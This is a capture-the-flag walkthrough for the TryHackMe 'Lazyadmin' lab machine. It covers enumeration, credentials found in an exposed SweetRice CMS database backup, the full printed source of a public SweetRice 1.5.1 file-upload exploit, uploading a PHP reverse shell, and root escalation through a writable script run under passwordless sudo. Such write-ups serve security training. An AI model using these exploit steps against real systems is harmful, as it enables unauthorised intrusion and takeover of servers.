Lazyadmin

Have some fun! There might be multiple ways to get user access.

https://tryhackme.com/room/lazyadmin

Enumeration

First off lets start with enumerating the machine!.

Start off with nmap -sC -sV -v -oA nmap/machine_name $IP.

-sC will use the default scripts on the discovered services.

-sV will enumerate the versions of the discovered services.

-v for a verbose output

-oA output the result in different formats(xml, txt, html)

With that we get the following result.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne

There are two services running OpenSSH and Apache and they both tell us that this is a Linux box, notably Ubuntu.

Upon opening the webpage, we are greeted with the default page when you first start up Apache.

There is nothing much we can do here, so lets check for hidden directories with gobuster.

gobuster dir -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt -t 50 -o gobuster-root-content

dir -u $url is the target IP.

-w is which wordlist to use.

-t # this indicated how many threads to use, the bigger the number, the more requests the faster the discovery, however there could be chances that you might get blocked from the webserver if you go too fast.

-o store the result in a file.

After finishing we get

/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/content (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)

The only interesting directory is /content.

Opening it it shows us Welcome to SweetRice. This is our first clue on what is running on Apache.

There is also a link that will show you a few tips on what to do after installing Sweet Rice CMS.

Reading the tips, you'll notice that tip #2 is quite interesting.

2,Protect your data.

SweetRice save all important file in the inc directory,there are two kinds of format ?:.txt (link.txt , htaccess.txt, lastest.txt) and .db (if track feature enabled).If you are using apache server,the file .htaccess which in inc directory will work for protect your data,if your server is nginx,you may see Security setting for Nginx.For other web server ,you may try it yourself.

This is our second clue on where to look for stored information and credentials.

And if we check if the /inc directory is available, it indeed is and it has interesting files.

.htaccess.txt doesn't do us any good, however latest.txt and mysql_backup/ have valuable stuff.

Latest shows us which version of Sweet Rice is running and we can lookup online to see any vulnerabilities for that version and in the mysql_backup/ directory there could be stored credentials in it.

Downloading the SQL file and reading it (you can view it with a simple text editor or just cat it) closely, we can see that there are credentials stored in for Sweet Rice CMS.

The user is manager and the password is an MD5 hash which can be easily cracked.

Next is to find where the dashboard is as the website said. Do another gobuster scan on the /content directory.

gobuster dir -u http://$TARGET_IP/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o gobuster-content-contents

With this we get

/images (Status: 301)
/js (Status: 301)
/inc (Status: 301)
/as (Status: 301)
/_themes (Status: 301)
/attachment (Status: 301)

In the /as directory we are greeted with a login page for Sweet Rice.

Now lets search for an exploit for version 1.5.1.

Using searchsploit sweetrice we get a bunch of exploits for version 1.5.1 if you don't have searchsploit on your machine, just search Sweet Rice CMS 1.5.1 exploit online and you'll find the same results on ExploitDB

SweetRice 0.5.3 - Remote File Inclusion                                             
SweetRice 0.6.7 - Multiple Vulnerabilities                                           
SweetRice 1.5.1 - Arbitrary File Download                                           
SweetRice 1.5.1 - Arbitrary File Upload                                             
SweetRice 1.5.1 - Backup Disclosure                                                 
SweetRice 1.5.1 - Cross-Site Request Forgery                                         
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                   
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload

I'll be using the Arbitrary File Upload, but manually without using the script.

I'll paste the whole source code of the python exploit here and will go through it on what it does and how to exploit the service without using the script.

#/usr/bin/python
#-*- Coding: utf-8 -*-
# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql

import requests
import os
from requests import session

if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
    pass
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                  |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |                                                    
|    > SweetRice 1.5.1 Unrestricted File Upload                     |
|    > Script Cod3r : Ehsan Hosseini                                |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''

print(banner)


# Get Host & User & Pass & filename
host = input("Enter The Target URL(Example : localhost.com) : ") 
username = input("Enter Username : ")
password = input("Enter Password : ")
filename = input("Enter FileName (Example:.htaccess,shell.php5,index.html) : ")
file = {'upload[]': open(filename, 'rb')}

payload = {
    'user':username,
    'passwd':password,
    'rememberMe':''
}



with session() as r:
    login = r.post('http://' + host + '/as/?type=signin', data=payload)
    success = 'Login success'
    if login.status_code == 200:
        print("[+] Sending User&Pass...")
        if login.text.find(success) > 1:
            print("[+] Login Succssfully...")
        else:
            print("[-] User or Pass is incorrent...")
            print("Good Bye...")
            exit()
            pass
        pass
    uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file)
    if uploadfile.status_code == 200:
        print("[+] File Uploaded...")
        print("[+] URL : http://" + host + "/attachment/" + filename)
        pass

Lets start from the top.

The script wants us to pass a username, password and a file to upload(preferably a PHP reverse shell).

Then it creates a session and does a POST request to the login page and logs in with the credentials we passed.

After that it uploads the file to the media_center tab which you can find it on the left side and it tells you where the file is stored. http://IP/attachment/file.

Instead of using the script lets do this on our own.

Navigate to the Media Center tab on the left

Now grab a PHP reverse shell from Pentestmonkey and set your local IP and PORT and set the PHP extension to .php5.

Start nc -lvnp PORT to listen on your desired port.

Now upload your PHP script to the Media Center and navigate to the /attachment directory an execute the script.

Privilege Escalation

Once you're in, always stabilize your shell.

 python -c 'import pty;pty.spawn("/bin/bash")' # Use Python to spawn a bash shell

 export TERM=xterm # This will allow you to clear your console

```
 Press CTRL+Z to foreground the shell
```

 stty raw -echo;fg #This will allow you to use TAB completion and the arrow keys and return you back to your shell.

After you've done that you can get the user flag in its default place :)

After that listing through the user directory we see two interesting files.

backup.pl and mysql_login.txt

Now I haven't done much exploring with MySQL on the machine and haven't found anything. Maybe you can search around and find something.

Looking at what the Perl script does

#!/usr/bin/perl

system("sh", "/etc/copy.sh");

It simply executes a shell script as system.

Looking at what we can do with that script

ls -lahs /etc/copy.sh 
4.0K -rw-r--rwx 1 root root 9 Feb  6 19:01 /etc/copy.sh

We can Read Write and eXecute, basically we can do anything with it.

Lets get a bash shell as root.

Simply rewrite the script with

echo -n "/bin/bash" > /etc/copy.sh

Now, if we simply execute the backup.pl script it doesn't do anything special. It just spawns another bash shell. This means there might be another way.

Checking sudo -l we can see

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

This means we can execute the Perl script as sudo without a password.

Simply running

sudo /usr/bin/perl /home/itguy/backup.pl

Will spawn us in a root shell.

With this, you can get the root flag in the root directory :)

Final Thoughts

This challenge was very easy. I had an easy time exploiting it.

As the challenge says, there might be multiple ways to exploit this. And there are sorta different ways to get a root shell with the backup.pl and copy.sh scripts.

Other different ways I haven't really found.

Hope you enjoyed my way of exploitation :)

PreviousRelevant NextTHM Reports

Last updated 3 years ago